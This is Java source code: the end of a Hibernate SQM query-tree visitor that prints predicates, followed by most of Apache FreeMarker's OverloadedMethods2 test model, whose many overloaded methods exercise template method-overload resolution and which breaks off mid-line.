public Object visitUnaryOperationExpression(SqmUnaryOperation<?> expression) { return null; } @Override public Object visitFunction(SqmFunction<?> tSqmFunction) { return null; } @Override public Object visitSetReturningFunction(SqmSetReturningFunction<?> tSqmFunction) { return null; } @Override public Object visitCoalesce(SqmCoalesce<?> sqmCoalesce) { return null; } @Override public Object visitToDuration(SqmToDuration<?> toDuration) { return null; } @Override public Object visitByUnit(SqmByUnit sqmByUnit) { return null; } @Override public Object visitExtractUnit(SqmExtractUnit<?> extractUnit) { return null; } @Override public Object visitFormat(SqmFormat sqmFormat) { return null; } @Override public Object visitCastTarget(SqmCastTarget<?> sqmCastTarget) { return null; } @Override public Object visitTrimSpecification(SqmTrimSpecification trimSpecification) { return null; } @Override public Object visitDistinct(SqmDistinct<?> distinct) { return null; } @Override public Object visitOverflow(SqmOverflow<?> sqmOverflow) { return null; } @Override public Object visitDurationUnit(SqmDurationUnit<?> durationUnit) { return null; } @Override public Object visitStar(SqmStar sqmStar) { return null; } @Override public Object visitOver(SqmOver<?> over) { return null; } @Override public Object visitWindow(SqmWindow window) { return null; } @Override public Object visitWhereClause(SqmWhereClause whereClause) { if ( whereClause != null && whereClause.getPredicate() != null ) { processStanza( "where", () -> whereClause.getPredicate().accept( this ) ); } return null; } @Override public Object visitGroupedPredicate(SqmGroupedPredicate predicate) { processStanza( "grouped", () -> { depth++; predicate.getSubPredicate().accept( this ); depth--; } ); return null; } @Override public Object visitJunctionPredicate(SqmJunctionPredicate predicate) { processStanza( predicate.getOperator() == Predicate.BooleanOperator.AND ? "and" : "or", () -> { for ( SqmPredicate subPredicate : predicate.getPredicates() ) { subPredicate.accept( this ); } } ); return null; } @Override public Object visitComparisonPredicate(SqmComparisonPredicate predicate) { processStanza( predicate.isNegated() ? predicate.getSqmOperator().negated().name() : predicate.getSqmOperator().name(), () -> { depth++; try { predicate.getLeftHandExpression().accept( this ); predicate.getRightHandExpression().accept( this ); } finally { depth--; } } ); return null; } @Override public Object visitIsEmptyPredicate(SqmEmptinessPredicate predicate) { processStanza( predicate.isNegated() ? "is-not-empty" : "is-empty", () -> { depth++; predicate.getPluralPath().accept( this ); depth--; } ); return null; } @Override public Object visitIsNullPredicate(SqmNullnessPredicate predicate) { processStanza( predicate.isNegated() ? "is-not-null" : "is-null", true, () -> predicate.getExpression().accept( this ) ); return null; } @Override public Object visitIsTruePredicate(SqmTruthnessPredicate predicate) { processStanza( (predicate.isNegated() ? "is-not-" : "is-") + predicate.getBooleanValue(), true, () -> predicate.getExpression().accept( this ) ); return null; } @Override public Object visitBetweenPredicate(SqmBetweenPredicate predicate) { processStanza( predicate.isNegated() ? "is-not-between" : "is-between", () -> { predicate.getExpression().accept( this ); predicate.getLowerBound().accept( this ); predicate.getUpperBound().accept( this ); } ); return null; } @Override public Object visitLikePredicate(SqmLikePredicate predicate) { final String likeType = predicate.isCaseSensitive() ? "like" : "ilike"; processStanza( ( predicate.isNegated() ? "is-not-" : "is-" ) + likeType, () -> { predicate.getPattern().accept( this ); predicate.getMatchExpression().accept( this ); if ( predicate.getEscapeCharacter() != null ) { predicate.getEscapeCharacter().accept( this ); } } ); return null; } @Override public Object visitMemberOfPredicate(SqmMemberOfPredicate predicate) { return null; } @Override public Object visitNegatedPredicate(SqmNegatedPredicate predicate) { return null; } @Override public Object visitInListPredicate(SqmInListPredicate<?> predicate) { return null; } @Override public Object visitInSubQueryPredicate(SqmInSubQueryPredicate<?> predicate) { return null; } @Override public Object visitBooleanExpressionPredicate(SqmBooleanExpressionPredicate predicate) { return null; } @Override public Object visitExistsPredicate(SqmExistsPredicate sqmExistsPredicate) { return null; } @Override public Object visitOrderByClause(SqmOrderByClause orderByClause) { return null; } @Override public Object visitSortSpecification(SqmSortSpecification sortSpecification) { return null; } @Override public Object visitOffsetExpression(SqmExpression<?> expression) { return null; } @Override public Object visitFetchExpression(SqmExpression<?> expression) { return null; } @Override public Object visitPluralAttributeSizeFunction(SqmCollectionSize function) { return null; } @Override public Object visitMapEntryFunction(SqmMapEntryReference<?, ?> function) { return null; } @Override public Object visitElementAggregateFunction(SqmElementAggregateFunction<?> binding) { return null; } @Override public Object visitIndexAggregateFunction(SqmIndexAggregateFunction<?> path) { return null; } @Override public Object visitFunctionPath(SqmFunctionPath<?> functionPath) { return null; } @Override public Object visitLiteral(SqmLiteral<?> literal) { return null; } @Override public Object visitTuple(SqmTuple<?> sqmTuple) { return null; } @Override public Object visitCollation(SqmCollation sqmCollate) { return null; } @Override public Object visitBinaryArithmeticExpression(SqmBinaryArithmetic<?> expression) { return null; } @Override public Object visitSubQueryExpression(SqmSubQuery<?> expression) { return null; } @Override public Object visitSimpleCaseExpression(SqmCaseSimple<?,?> expression) { return null; } @Override public Object visitSearchedCaseExpression(SqmCaseSearched<?> expression) { return null; } @Override public Object visitAny(SqmAny<?> sqmAny) { return null; } @Override public Object visitEvery(SqmEvery<?> sqmEvery) { return null; } @Override public Object visitSummarization(SqmSummarization<?> sqmSummarization) { return null; } @Override public Object visitAnyDiscriminatorTypeExpression(AnyDiscriminatorSqmPath<?> expression) { return null; } @Override public Object visitAnyDiscriminatorTypeValueExpression(SqmAnyDiscriminatorValue<?> expression) { return null; } @Override public Object visitDynamicInstantiation(SqmDynamicInstantiation<?> sqmDynamicInstantiation) { processStanza( "dynamic-instantiation (" + sqmDynamicInstantiation.getInstantiationTarget().getJavaType() + ')', () -> processStanza( "arguments", () -> sqmDynamicInstantiation.getArguments().forEach( argument -> processStanza( "argument (" + argument.getAlias() + ')', () -> { depth++; argument.getSelectableNode().accept( this ); depth--; } ) ) ) ); return null; } @Override public Object visitEnumLiteral(SqmEnumLiteral<?> sqmEnumLiteral) { return null; } @Override public Object visitFieldLiteral(SqmFieldLiteral<?> sqmFieldLiteral) { return null; } @Override public <N extends Number> Object visitHqlNumericLiteral(SqmHqlNumericLiteral<N> numericLiteral) { return null; } @Override public Object visitFullyQualifiedClass(Class<?> namedClass) { return null; } @Override public Object visitAsWrapperExpression(AsWrapperSqmExpression<?> expression) { return null; } @Override public Object visitNamedExpression(SqmNamedExpression<?> expression) { return null; } @Override public Object visitModifiedSubQueryExpression(SqmModifiedSubQueryExpression<?> expression) { return null; } }
apache/freemarker
34,963
freemarker-test-utils/src/main/java/freemarker/test/templatesuite/models/OverloadedMethods2.java
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package freemarker.test.templatesuite.models; import java.io.File; import java.io.Serializable; import java.math.BigDecimal; import java.math.BigInteger; import java.util.ArrayList; import java.util.Date; import java.util.List; import java.util.Map; import java.util.Set; import freemarker.core.Environment; import freemarker.ext.beans.RationalNumber; import freemarker.ext.util.WrapperTemplateModel; import freemarker.template.AdapterTemplateModel; import freemarker.template.ObjectWrapper; import freemarker.template.TemplateBooleanModel; import freemarker.template.TemplateModel; import freemarker.template.TemplateModelException; import freemarker.template.TemplateNumberModel; import freemarker.template.utility.StringUtil; import freemarker.test.utility.TestUtil; public class OverloadedMethods2 { public String mVarargs(String... a1) { StringBuilder sb = new StringBuilder(); for (String s : a1) { sb.append(s); } return "mVarargs(String... a1 = " + sb + ")"; } public BigInteger bigInteger(BigDecimal n) { return n.toBigInteger(); } public RationalNumber rational(int a, int b) { return new RationalNumber(a, b); } public String mVarargs(File a1, String... a2) { return "mVarargs(File a1, String... a2)"; } public NumberAndStringModel getNnS(String s) { return new NumberAndStringModel(s); } public String mNull1(String a1) { return "mNull1(String a1 = " + a1 + ")"; } public String mNull1(int a1) { return "mNull1(int a1 = " + a1 + ")"; } public String mNull2(String a1) { return "mNull2(String a1 = " + a1 + ")"; } public String mNull2(Object a1) { return "mNull2(Object a1 = " + a1 + ")"; } public String mSpecificity(Object a1, String a2) { return "mSpecificity(Object a1, String a2)"; } public String mSpecificity(String a1, Object a2) { return "mSpecificity(String a1, Object a2)"; } public String mChar(char a1) { return "mChar(char a1 = " + a1 + ")"; } public String mChar(Character a1) { return "mChar(Character a1 = " + a1 + ")"; } public String mBoolean(boolean a1) { return "mBoolean(boolean a1 = " + a1 + ")"; } public String mBoolean(Boolean a1) { return "mBoolean(Boolean a1 = " + a1 + ")"; } public int mIntNonOverloaded(int a1) { return a1; } public String mIntPrimVSBoxed(int a1) { return "mIntPrimVSBoxed(int a1 = " + a1 + ")"; } public String mIntPrimVSBoxed(Integer a1) { return "mIntPrimVSBoxed(Integer a1 = " + a1 + ")"; } public String mNumPrimVSPrim(short a1) { return "mNumPrimVSPrim(short a1 = " + a1 + ")"; } public String mNumPrimVSPrim(long a1) { return "mNumPrimVSPrim(long a1 = " + a1 + ")"; } public String mNumBoxedVSBoxed(Short a1) { return "mNumBoxedVSBoxed(Short a1 = " + a1 + ")"; } public String mNumBoxedVSBoxed(Long a1) { return "mNumBoxedVSBoxed(Long a1 = " + a1 + ")"; } public String mNumUnambigous(Short a1, boolean otherOverload) { return "mmNumUnambigous won't be called"; } public String mNumUnambigous(Integer a1) { return "mNumUnambigous(Integer a1 = " + a1 + ")"; } public String mNumBoxedAll(Byte a1) { return "mNumBoxedAll(Byte a1 = " + a1 + ")"; } public String mNumBoxedAll(Short a1) { return "mNumBoxedAll(Short a1 = " + a1 + ")"; } public String mNumBoxedAll(Integer a1) { return "mNumBoxedAll(Integer a1 = " + a1 + ")"; } public String mNumBoxedAll(Long a1) { return "mNumBoxedAll(Long a1 = " + a1 + ")"; } public String mNumBoxedAll(Float a1) { return "mNumBoxedAll(Float a1 = " + a1 + ")"; } public String mNumBoxedAll(Double a1) { return "mNumBoxedAll(Double a1 = " + a1 + ")"; } public String mNumBoxedAll(BigInteger a1) { return "mNumBoxedAll(BigInteger a1 = " + a1 + ")"; } public String mNumBoxedAll(BigDecimal a1) { return "mNumBoxedAll(BigDecimal a1 = " + a1 + ")"; } public String mNumPrimAll(byte a1) { return "mNumPrimAll(byte a1 = " + a1 + ")"; } public String mNumPrimAll(short a1) { return "mNumPrimAll(short a1 = " + a1 + ")"; } public String mNumPrimAll(int a1) { return "mNumPrimAll(int a1 = " + a1 + ")"; } public String mNumPrimAll(long a1) { return "mNumPrimAll(long a1 = " + a1 + ")"; } public String mNumPrimAll(float a1) { return "mNumPrimAll(float a1 = " + a1 + ")"; } public String mNumPrimAll(double a1) { return "mNumPrimAll(double a1 = " + a1 + ")"; } public String mNumPrimAll(BigInteger a1) { return "mNumPrimAll(BigInteger a1 = " + a1 + ")"; } public String mNumPrimAll(BigDecimal a1) { return "mNumPrimAll(BigDecimal a1 = " + a1 + ")"; } public String mNumBoxedAll2nd(Short a1) { return "mNumBoxedAll2nd(Short a1 = " + a1 + ")"; } public String mNumBoxedAll2nd(Long a1) { return "mNumBoxedAll2nd(Long a1 = " + a1 + ")"; } public String mNumBoxedAll2nd(Double a1) { return "mNumBoxedAll2nd(Double a1 = " + a1 + ")"; } public String mNumPrimAll2nd(short a1) { return "mNumPrimAll2nd(short a1 = " + a1 + ")"; } public String mNumPrimAll2nd(long a1) { return "mNumPrimAll2nd(long a1 = " + a1 + ")"; } public String mNumPrimAll2nd(double a1) { return "mNumPrimAll2nd(double a1 = " + a1 + ")"; } public String mNumPrimFallbackToNumber(long a1) { return "mNumPrimFallbackToNumber(long a1 = " + a1 + ")"; } public String mNumPrimFallbackToNumber(Number a1) { return "mNumPrimFallbackToNumber(Number a1 = " + a1 + ")"; } public String mNumPrimFallbackToNumber(Object a1) { return "mNumPrimFallbackToNumber(Object a1 = " + a1 + ")"; } public String mNumBoxedFallbackToNumber(Long a1) { return "mNumBoxedFallbackToNumber(Long a1 = " + a1 + ")"; } public String mNumBoxedFallbackToNumber(Number a1) { return "mNumBoxedFallbackToNumber(Number a1 = " + a1 + ")"; } public String mNumBoxedFallbackToNumber(Object a1) { return "mNumBoxedFallbackToNumber(Object a1 = " + a1 + ")"; } public String mDecimalLoss(int a1) { return "mDecimalLoss(int a1 = " + a1 + ")"; } public String mDecimalLoss(double a1) { return "mDecimalLoss(double a1 = " + a1 + ")"; } public String mNumConversionLoses1(byte i, Object o1, Object o2) { return "byte " + i; } public String mNumConversionLoses1(double i, Object o1, Object o2) { return "double " + i; } public String mNumConversionLoses1(Number i, String o1, String o2) { return "Number " + i + " " + i.getClass().getName(); } public String mNumConversionLoses2(int i, Object o1, Object o2) { return "int " + i; } public String mNumConversionLoses2(long i, Object o1, Object o2) { return "long " + i; } public String mNumConversionLoses2(Number i, String o1, String o2) { return "Number " + i + " " + i.getClass().getName(); } public String mNumConversionLoses3(int i, Object o1, Object o2) { return "int " + i; } public String mNumConversionLoses3(Serializable i, String o1, String o2) { return "Serializable " + i + " " + i.getClass().getName(); } public String nIntAndLong(int i) { return "nIntAndLong(int " + i + ")"; } public String nIntAndLong(long i) { return "nIntAndLong(long " + i + ")"; } public String nIntAndShort(int i) { return "nIntAndShort(int " + i + ")"; } public String nIntAndShort(short i) { return "nIntAndShort(short " + i + ")"; } public String nLongAndShort(long i) { return "nLongAndShort(long " + i + ")"; } public String nLongAndShort(short i) { return "nLongAndShort(short " + i + ")"; } public String varargs1(String s, int... xs) { return "varargs1(String s = " + StringUtil.jQuote(s) + ", int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs1(String s, double... xs) { return "varargs1(String s = " + StringUtil.jQuote(s) + ", double... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs1(String s, Object... xs) { return "varargs1(String s = " + StringUtil.jQuote(s) + ", Object... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs1(Object s, Object... xs) { return "varargs1(Object s = " + s + ", Object... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs2(int... xs) { return "varargs2(int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs2(double... xs) { return "varargs2(double... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs3(String... xs) { return "varargs3(String... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs3(Comparable... xs) { return "varargs3(Comparable... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs3(Object... xs) { return "varargs3(Object... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs4(Integer... xs) { return "varargs4(Integer... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs4(int... xs) { return "varargs4(int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs5(int... xs) { return "varargs5(int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs5(int a1, int... xs) { return "varargs5(int a1 = " + a1 + ", int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs5(int a1, int a2, int... xs) { return "varargs5(int a1 = " + a1 + ", int a2 = " + a2 + ", int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs5(int a1, int a2, int a3, int... xs) { return "varargs5(int a1 = " + a1 + ", int a2 = " + a2 + ", int a3 = " + a3 + ", int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs6(String a1, int... xs) { return "varargs6(String a1 = " + a1 + ", int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs6(Object a1, int a2, int... xs) { return "varargs6(Object a1 = " + a1 + ", int a2 = " + a2 + ", int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs7(int... xs) { return "varargs7(int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String varargs7(short a1, int... xs) { return "varargs7(short a1 = " + a1 + ", int... xs = " + TestUtil.arrayToString(xs) + ")"; } public String mNullAmbiguous(String s) { return "mNullAmbiguous(String s = " + s + ")"; } public String mNullAmbiguous(int i) { return "mNullAmbiguous(int i = " + i + ")"; } public String mNullAmbiguous(File f) { return "mNullAmbiguous(File f = " + f + ")"; } public String mNullAmbiguous2(String s) { return "mNullNonAmbiguous(String s = " + s + ")"; } public String mNullAmbiguous2(File f) { return "mNullAmbiguous(File f = " + f + ")"; } public String mNullAmbiguous2(Object o) { return "mNullAmbiguous(Object o = " + o + ")"; } public String mNullNonAmbiguous(String s) { return "mNullNonAmbiguous(String s = " + s + ")"; } public String mNullNonAmbiguous(int i) { return "mNullNonAmbiguous(int i = " + i + ")"; } public String mVarargsIgnoredTail(int i, double... ds) { return "mVarargsIgnoredTail(int i = " + i + ", double... ds = " + TestUtil.arrayToString(ds) + ")"; } public String mVarargsIgnoredTail(int... is) { return "mVarargsIgnoredTail(int... is = " + TestUtil.arrayToString(is) + ")"; } public String mLowRankWins(int x, int y, Object o) { return "mLowRankWins(int x = " + x + ", int y = " + y + ", Object o = " + o + ")"; } public String mLowRankWins(Integer x, Integer y, String s) { return "mLowRankWins(Integer x = " + x + ", Integer y = " + y + ", String s = " + s + ")"; } public String mRareWrappings(File f, double d1, Double d2, double d3, boolean b) { return "mRareWrappings(File f = " + f + ", double d1 = " + d1 + ", Double d2 = " + d2 + ", double d3 = " + d3 + ", b = " + b + ")"; } public String mRareWrappings(Object o, double d1, Double d2, Double d3, boolean b) { return "mRareWrappings(Object o = " + o + ", double d1 = " + d1 + ", Double d2 = " + d2 + ", double d3 = " + d3 + ", b = " + b + ")"; } public String mRareWrappings(String s, double d1, Double d2, Double d3, boolean b) { return "mRareWrappings(String s = " + s + ", double d1 = " + d1 + ", Double d2 = " + d2 + ", double d3 = " + d3 + ", b = " + b + ")"; } public String mRareWrappings2(String s) { return "mRareWrappings2(String s = " + s + ")"; } public String mRareWrappings2(byte b) { return "mRareWrappings2(byte b = " + b + ")"; } public File getFile() { return new File("file"); } public String mSeqToArrayNonOverloaded(String[] items, String s) { return "mSeqToArrayNonOverloaded(String[] " + TestUtil.arrayToString(items) + ", String " + s + ")"; } public String mSeqToArrayGoodHint(String[] items, String s) { return "mSeqToArrayGoodHint(String[] " + TestUtil.arrayToString(items) + ", String " + s + ")"; } public String mSeqToArrayGoodHint(String[] items, int i) { return "mSeqToArrayGoodHint(String[] " + TestUtil.arrayToString(items) + ", int " + i + ")"; } public String mSeqToArrayGoodHint2(String[] items, String s) { return "mSeqToArrayGoodHint2(String[] " + TestUtil.arrayToString(items) + ", String " + s + ")"; } public String mSeqToArrayGoodHint2(String item) { return "mSeqToArrayGoodHint2(String " + item + ")"; } public String mSeqToArrayPoorHint(String[] items, String s) { return "mSeqToArrayPoorHint(String[] " + TestUtil.arrayToString(items) + ", String " + s + ")"; } public String mSeqToArrayPoorHint(String item, int i) { return "mSeqToArrayPoorHint(String " + item + ", int " + i + ")"; } public String mSeqToArrayPoorHint2(String[] items) { return "mSeqToArrayPoorHint2(String[] " + TestUtil.arrayToString(items) + ")"; } public String mSeqToArrayPoorHint2(String item) { return "mSeqToArrayPoorHint2(String " + item + ")"; } public String mSeqToArrayPoorHint3(String[] items) { return "mSeqToArrayPoorHint3(String[] " + TestUtil.arrayToString(items) + ")"; } public String mSeqToArrayPoorHint3(int[] items) { return "mSeqToArrayPoorHint3(int[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVsListPreference(String[] items) { return "mStringArrayVsListPreference(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVsListPreference(List items) { return "mStringArrayVsListPreference(List " + TestUtil.listToString(items) + ")"; } public String mStringArrayVsObjectArrayPreference(String[] items) { return "mStringArrayVsObjectArrayPreference(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVsObjectArrayPreference(Object[] items) { return "mStringArrayVsObjectArrayPreference(Object[] " + TestUtil.arrayToString(items) + ")"; } public String mIntArrayVsIntegerArrayPreference(int[] items) { return "mIntArrayVsIntegerArrayPreference(int[] " + TestUtil.arrayToString(items) + ")"; } public String mIntArrayVsIntegerArrayPreference(Integer[] items) { return "mIntArrayVsIntegerArrayPreference(Integer[] " + TestUtil.arrayToString(items) + ")"; } public String mIntArrayNonOverloaded(int[] items) { return "mIntArrayNonOverloaded(int[] " + TestUtil.arrayToString(items) + ")"; } public String mIntegerArrayNonOverloaded(Integer[] items) { return "mIntegerArrayNonOverloaded(Integer[] " + TestUtil.arrayToString(items) + ")"; } public String mIntegerListNonOverloaded(List<Integer> items) { return "mIntegerListNonOverloaded(List<Integer> " + items + ")"; } public String mStringListNonOverloaded(List<String> items) { return "mStringListNonOverloaded(List<String> " + items + ")"; } public String mStringArrayNonOverloaded(String[] items) { return "mStringArrayNonOverloaded(String[] " + TestUtil.arrayToString(items) + ")"; } public String mObjectListNonOverloaded(List<Object> items) { return "mObjectListNonOverloaded(List<Object> " + items + ")"; } public String mObjectArrayNonOverloaded(Object[] items) { return "mObjectArrayNonOverloaded(Object[] " + TestUtil.arrayToString(items) + ")"; } public String mIntegerArrayOverloaded(Integer[] items, int i) { return "mIntegerArrayOverloaded(Integer[] " + TestUtil.arrayToString(items) + ", int " + i + ")"; } public String mIntegerArrayOverloaded(Object obj, boolean b) { return "mIntegerArrayOverloaded(Object " + obj + ", boolean " + b + ")"; } public String mStringArrayOverloaded(String[] items, int i) { return "mStringArrayOverloaded(String[] " + TestUtil.arrayToString(items) + ", int " + i + ")"; } public String mStringArrayOverloaded(Object obj, boolean b) { return "mStringArrayOverloaded(Object " + obj + ", boolean " + b + ")"; } public String mCharArrayOverloaded(char[] items, int i) { return "mCharArrayOverloaded(char[] " + TestUtil.arrayToString(items) + ", int " + i + ")"; } public String mCharArrayOverloaded(Character[] items, String s) { return "mCharArrayOverloaded(Character[] " + TestUtil.arrayToString(items) + ", String " + s + ")"; } public String mCharArrayOverloaded(Object obj, boolean b) { return "mCharArrayOverloaded(Object " + obj + ", boolean " + b + ")"; } public String mStringArrayArrayOverloaded(String[][] arrayArray, int i) { return "mStringArrayArrayOverloaded(String[][] " + TestUtil.arrayToString(arrayArray) + ", int " + i + ")"; } public String mStringArrayArrayOverloaded(Object obj, boolean b) { return "mStringArrayArrayOverloaded(Object " + obj + ", boolean " + b + ")"; } public String mIntArrayArrayOverloaded(int[][] xss) { return "mIntArrayArrayOverloaded(" + TestUtil.arrayToString(xss) + ")"; } public String mIntArrayArrayOverloaded(String s) { return "mIntArrayArrayOverloaded(" + s + ")"; } public String mArrayOfListsOverloaded(List[] xss) { return "mArrayOfListsOverloaded(" + TestUtil.arrayToString(xss) + ")"; } public String mArrayOfListsOverloaded(String x) { return "mArrayOfListsOverloaded(" + x + ")"; } public String mIntArrayArrayNonOverloaded(int[][] xss) { return "mIntArrayArrayNonOverloaded(" + TestUtil.arrayToString(xss) + ")"; } public String mArrayOfListsNonOverloaded(List[] xss) { return "mArrayOfListsNonOverloaded(" + TestUtil.arrayToString(xss) + ")"; } public String mStringArrayVarargsNonOverloaded(String... items) { return "mStringArrayVarargsNonOverloaded(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded(String... items) { return "mStringArrayVarargsNonOverloaded(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded1(String... items) { return "mStringArrayVarargsOverloaded1(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded1(List<String> items) { return "mStringArrayVarargsOverloaded1(List " + TestUtil.listToString(items) + ")"; } public String mStringArrayVarargsOverloaded2(String... items) { return "mStringArrayVarargsOverloaded2(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded2(String item) { return "mStringArrayVarargsOverloaded2(String " + item + ")"; } public String mStringArrayVarargsOverloaded3(String... items) { return "mStringArrayVarargsOverloaded3(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded3(String item1, String item2) { return "mStringArrayVarargsOverloaded3(String " + item1 + ", String " + item2 + ")"; } public String mStringArrayVarargsOverloaded4(String... items) { return "mStringArrayVarargsOverloaded4(String[] " + TestUtil.arrayToString(items) + ")"; } public String mStringArrayVarargsOverloaded4(List... items) { return "mStringArrayVarargsOverloaded4(List[] " + TestUtil.arrayToString(items) + ")"; } public String mListOrString(List<String> items) { return "mListOrString(List " + TestUtil.listToString(items) + ")"; } public String mListOrString(String item) { return "mListOrString(String " + item + ")"; } public String mListListOrString(List<List<Object>> items) { return "mListListOrString(List " + TestUtil.listToString(items) + ")"; } public String mListListOrString(String item) { return "mListListOrString(String " + item + ")"; } public String mMapOrBoolean(Map v) { return "mMapOrBoolean(Map " + v + ")"; } public String mMapOrBoolean(boolean v) { return "mMapOrBoolean(boolean " + v + ")"; } public String mMapOrBooleanVarargs(Map... v) { return "mMapOrBooleanVarargs(Map... " + TestUtil.arrayToString(v) + ")"; } public String mMapOrBooleanVarargs(boolean... v) { return "mMapOrBooleanVarargs(boolean... " + TestUtil.arrayToString(v) + ")"; } public String mMapOrBooleanFixedAndVarargs(Map v) { return "mMapOrBooleanFixedAndVarargs(Map " + v + ")"; } public String mMapOrBooleanFixedAndVarargs(boolean v) { return "mMapOrBooleanFixedAndVarargs(boolean " + v + ")"; } public String mMapOrBooleanFixedAndVarargs(Map... v) { return "mMapOrBooleanFixedAndVarargs(Map... " + TestUtil.arrayToString(v) + ")"; } public String mMapOrBooleanFixedAndVarargs(boolean... v) { return "mMapOrBooleanFixedAndVarargs(boolean... " + TestUtil.arrayToString(v) + ")"; } public String mNumberOrArray(Number v) { return "mNumberOrArray(Number " + v + ")"; } public String mNumberOrArray(Object[] v) { return "mNumberOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mIntOrArray(int v) { return "mIntOrArray(int " + v + ")"; } public String mIntOrArray(Object[] v) { return "mIntOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mDateOrArray(Date v) { return "mDateOrArray(Date " + v.getTime() + ")"; } public String mDateOrArray(Object[] v) { return "mDateOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mStringOrArray(String v) { return "mStringOrArray(String " + v + ")"; } public String mStringOrArray(Object[] v) { return "mStringOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mBooleanOrArray(boolean v) { return "mBooleanOrArray(boolean " + v + ")"; } public String mBooleanOrArray(Object[] v) { return "mBooleanOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mMapOrArray(Map v) { return "mMapOrArray(Map " + v + ")"; } public String mMapOrArray(Object[] v) { return "mMapOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mListOrArray(List v) { return "mListOrArray(List " + v + ")"; } public String mListOrArray(Object[] v) { return "mListOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mSetOrArray(Set v) { return "mSetOrArray(Set " + v + ")"; } public String mSetOrArray(Object[] v) { return "mSetOrArray(Object[] " + TestUtil.arrayToString(v) + ")"; } public String mCharNonOverloaded(char c) { return "mCharNonOverloaded(char " + c + ")"; } public String mCharacterNonOverloaded(Character c) { return "mCharacterNonOverloaded(Character " + c + ")"; } public String mCharOrCharacterOverloaded(char c) { return "mCharOrCharacterOverloaded(char " + c + ")"; } public String mCharOrCharacterOverloaded(Character c) { return "mCharOrCharacterOverloaded(Character " + c + ")"; } public String mCharOrBooleanOverloaded(char c) { return "mCharOrBooleanOverloaded(char " + c + ")"; } public String mCharOrBooleanOverloaded(boolean b) { return "mCharOrBooleanOverloaded(boolean " + b + ")"; } public String mCharOrStringOverloaded(char c, boolean b) { return "mCharOrStringOverloaded(char " + c + ", boolean " + b + ")"; } public String mCharOrStringOverloaded(String s, int i) { return "mCharOrStringOverloaded(String " + s + ", int " + i + ")"; } public String mCharacterOrStringOverloaded(Character c, boolean b) { return "mCharacterOrStringOverloaded(Character " + c + ", boolean " + b + ")"; } public String mCharacterOrStringOverloaded(String s, int i) { return "mCharacterOrStringOverloaded(String " + s + ", int " + i + ")"; } public String mCharOrStringOverloaded2(String s) { return "mCharOrStringOverloaded2(String " + s + ")"; } public String mCharOrStringOverloaded2(char c) { return "mCharOrStringOverloaded2(char " + c + ")"; } public String mCharacterOrStringOverloaded2(String s) { return "mCharacterOrStringOverloaded2(String " + s + ")"; } public String mCharacterOrStringOverloaded2(Character c) { return "mCharacterOrStringOverloaded2(Character " + c + ")"; } public String getJavaString() { return "s"; } public List getJavaStringList() { List list = new ArrayList(); list.add("a"); list.add("b"); return list; } public List getJavaString2List() { List list = new ArrayList(); list.add("aa"); list.add("bb"); return list; } public List getJavaStringListList() { List listList = new ArrayList(); { List list = new ArrayList(); list.add("a"); list.add("b"); listList.add(list); } { List list = new ArrayList(); list.add("c"); listList.add(list); } return listList; } public List getJavaStringSequenceList() throws TemplateModelException { ObjectWrapper ow = Environment.getCurrentEnvironment().getObjectWrapper(); List listList = new ArrayList(); { List list = new ArrayList(); list.add("a"); list.add("b"); listList.add(ow.wrap(list)); } { List list = new ArrayList(); list.add("c"); listList.add(ow.wrap(list)); } return listList; } public List<int[]> getJavaListOfIntArrays() { List list = new ArrayList(); list.add(new int[] {1, 2, 3}); list.add(new int[] {}); list.add(new int[] {4}); return list; } @SuppressWarnings("boxing") public List getJavaIntegerListList() { List listList = new ArrayList(); { List list = new ArrayList(); list.add(1); list.add(2); listList.add(list); } { List list = new ArrayList(); list.add(3); listList.add(list); } return listList; } @SuppressWarnings("boxing") public List<Integer> getJavaIntegerList() { List<Integer> list = new ArrayList<>(); list.add(1); list.add(2); return list; } @SuppressWarnings("boxing") public List<Byte> getJavaByteList() { List<Byte> list = new ArrayList<>(); list.add((byte) 1); list.add((byte) 2); return list; } @SuppressWarnings("boxing") public List<Character> getJavaCharacterList() { List<Character> list = new ArrayList<>(); list.add('c'); list.add('C'); return list; } public String[] getJavaStringArray() { return new String[] { "a", "b" }; } public int[] getJavaIntArray() { return new 